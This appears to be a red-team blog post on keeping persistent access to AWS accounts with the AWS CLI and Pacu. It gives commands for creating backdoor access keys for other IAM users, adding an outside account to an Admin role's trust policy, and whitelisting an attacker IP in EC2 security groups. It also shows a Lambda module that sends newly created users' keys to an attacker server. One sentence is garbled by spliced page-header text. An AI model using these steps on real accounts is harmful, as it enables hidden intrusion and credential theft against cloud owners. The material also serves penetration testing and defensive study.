Using Boto3 and Pacu to Maintain AWS Persistence

Establishing persistence in an AWS environment allows penetration testers to maintain privileged access, even if their initial compromise is detected and revoked. This blog post focuses on leveraging Boto3 and Pacu to implement AWS native persistence techniques such as creating backdoor IAM credentials, manipulating trust relationships, and more.

🛡️ What Is AWS Persistence?

Persistence refers to maintaining access to an environment over time, even when defensive actions try to remove that access. In AWS, persistence might involve:

• Backdoor IAM credentials
• Malicious Lambda functions
• Modified security groups
• Exploiting trust relationships

We’re focusing on cloud native persistence, rather than traditional malware or implants.

🔐 IAM Backdoors: Access Keys

Every IAM user in AWS is allowed two access key pairs. If an attacker already has access to one key, they can create a second pair using create-access-key assuming the limit hasn't been reached.

1aws iam list-users --profile Test
2aws iam list-access-keys --user-name Sarah --profile Test
3aws iam create-access-key --user-name Sarah --profile Test

Once keys are generated, they can be configured locally

1aws configure --profile Sarah

Or imported into Pacu

1set_keys

🔁 This method enables privilege escalation if the user has iam:CreateAccessKey, even if their original privileges are minimal.

🧰 Pacu for Persistence

Using Pacu, this task is made effortless. The iam__backdoor_users_keys module automates the creation of access keys for other users in the environment.

1run iam__backdoor_users_keys

This creates an additional key pair for a target IAM user, providing fallback access. You can also supply a specific username.

🤝 Backdooring Role Trust Relationships

IAM roles can be assumed across AWS accounts. Modify a role’s trust policy to add your attacker AWS account

1{
2"Version": "2012-10-17",
3"Statement": [
4  {
5    "Effect": "Allow",
6    "Principal": {
7      "AWS": [
8        "arn:aws:iam::111111111111:root",
9        "arn:aws:iam::012345678912:root"
10      ]
11    },
12    "Action": "sts:AssumeRole"
13  }
14]
15}

Then update withMarch 17, 2025 AWS Security Pentesting Persistence Using Boto3 and Pacu to Maintain

1aws iam update-assume-role-policy --role-name Admin --policy-document file://trust-policy.json --profile Test

To automate it using Pacu

1run iam__backdoor_assume_role --role-names Admin --user-arns arn:aws:iam::012345678912:root

🔐 Backdooring EC2 Security Groups

Inject rules into EC2 security groups to whitelist your IP for specific ports

1aws ec2 authorize-security-group-ingress --group-id sg-XYZ --protocol tcp --port 27017-27018 --cidr 1.1.1.1/32

Pacu automation

1run ec2__backdoor_ec2_sec_groups --ip 1.1.1.1/32 --port-range 27017-27018 --protocol tcp --groups corp@us-west-2

🧠 Lambda Based Persistence

Lambda for Credential Exfiltration

Deploy a Lambda function that triggers on user creation and sends new access keys to your server

Pacu automates this

1run lambda__backdoor_new_users --exfil-url http://attacker-server.com/

Cleanup

1run lambda__backdoor_new_users --cleanup

✅ Summary

Establishing persistence in AWS is a critical skill for red teamers. Boto3 provides full control for manual scripting, while Pacu accelerates and automates most processes. Use these techniques responsibly and always clean up after your assessments.